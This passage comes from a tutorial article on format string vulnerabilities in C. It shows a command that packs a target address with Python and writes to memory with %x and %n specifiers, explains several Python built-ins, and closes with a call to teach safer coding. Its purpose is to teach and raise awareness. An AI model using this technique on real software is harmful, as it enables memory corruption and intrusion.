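# e.g. build_write_payload(0x08049660, 100, offset=9) -- the target address
# from the command below; both numbers must be re-derived on other systems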
In Figure 6, we have updated our code to print the memory address of an integer value held in the program.
Figure 6. An Update
The code now also returns an integer and prints its location (saving us the trouble of looking for it). Alternatively, we could simply run objdump (Figure 8) and have the location returned to us that way. Notice that the two values in Figures 7 and 8 do not match: we have run this on a couple of systems, and memory layout will of course vary from system to system, hence why we need to locate the variables we wish to overwrite.
What we have done here is seek to overwrite a memory location; we will go into detail about this method of overwriting data in a follow-up article.
./Format_Exploit `python -c 'print "\x60\x96\x04\x08"'`%x%x%x%x%x%x%x%x%n
This is a time-consuming and messy way of seeking the location we wish to overwrite and of obtaining the value we want. As we can see from Figure 9, it is also a method that can result in crashing the application. This can lead to a self-imposed DoS by attackers against themselves (through locking themselves out of the application they are attempting to exploit).
Figure 9. Crash
More importantly, this is a noisy means of creating an exploit, and if the attacker does not have complete control of the system the application is running on, they may find that they have alerted the system administrator to their presence.
Why Python?
Python is particularly valuable to the exploit writer for many reasons. Here we will list just a few of the built-in
functions that are frequently deployed in Python scripts.
print
The print function returns output or the contents of variables, and format string modifiers can modify its output. Just as in C code, Python has format conversion specifiers, including arguments such as %d for a decimal integer, %s for a string, or %x for a hexadecimal value. The values to be substituted are placed after a trailing %, in a comma-separated list within parentheses (a short example follows these descriptions).
len
Returns the length of any object. The len function is a convenient means to determine the length of a string. It can
also be used to return the number of elements in a list.
int
Converts a string to an integer. This function is frequently needed where input has been received as a string,
but which needs to be changed into some numerical value in order to have mathematical operators (+,-,*,/
etc.) used without error.
ord
Converts a character of string data to its ordinal value. Similar to int, this function allows strings of binary data to be converted, byte by byte, into numerical form, including values that do not represent printable digits.
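A short example (Python 2, matching the style used throughout this article) pulling these built-ins together:

buff = "AAAA"
print "length: %d" % len(buff)           # len: number of characters -> 4
print "as hex: %x" % int("255")          # int: string "255" to integer -> ff
print "first byte: %d" % ord(buff[0])    # ord: character "A" to ordinal -> 65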
When we are seeking to exploit a location in memory, Python allows us to control the input with far more finesse and fewer errors than if, for instance, we had started trying to count by hand how many format specifiers to type.
We see in Figure 10 that we have changed the answer stored in the application from 100 to 23. In a subsequent
article, we will follow up on this process by setting the width parameter and the requirements for padding. This
will allow us to select just what we write and the value we inject into our format string vulnerability.
Conclusion
We can see from this that common programming errors arising from the failure to include a simple format identifier can lead to devastating results. Unfortunately, many current textbooks and C/C++ programming classes still teach these poor programming practices and produce developers who do not even realise (see, for example, http://stackoverflow.com/questions/1677824/snowleopard-xcode-warning-formatnot-a-string-literal-and-no-format-arguments) that they are leaving gaping security holes in their code. Many developers who realise that the warning issued by current versions of gcc, when they fail to include the correct number of format identifiers, can be ignored simply do just that: they ignore the warning and compile their code, bugs and all.
Format string vulnerabilities are not new. It is a worry that a decade later we still suffer from these same issues, but then, as always, how we teach new developers matters. Until we make compiler warnings into hard errors that stop the compilation of code, and really teach the need to ensure format strings are managed, the problems will persist. This process can be taken further through the exploitation of Direct Parameter Access (DPA), which allows us to write to an address of our choosing. In the next article, we will extend the overwriting of memory, looking more at using %n to overwrite specific memory locations and at techniques to ensure success without so many segmentation faults and errors, and then move on to overwriting the Global Offset Table (GOT; see http://bottomupcs.sourceforge.net/csbu/x3824.htm). We will demonstrate how this can be used to inject shell code.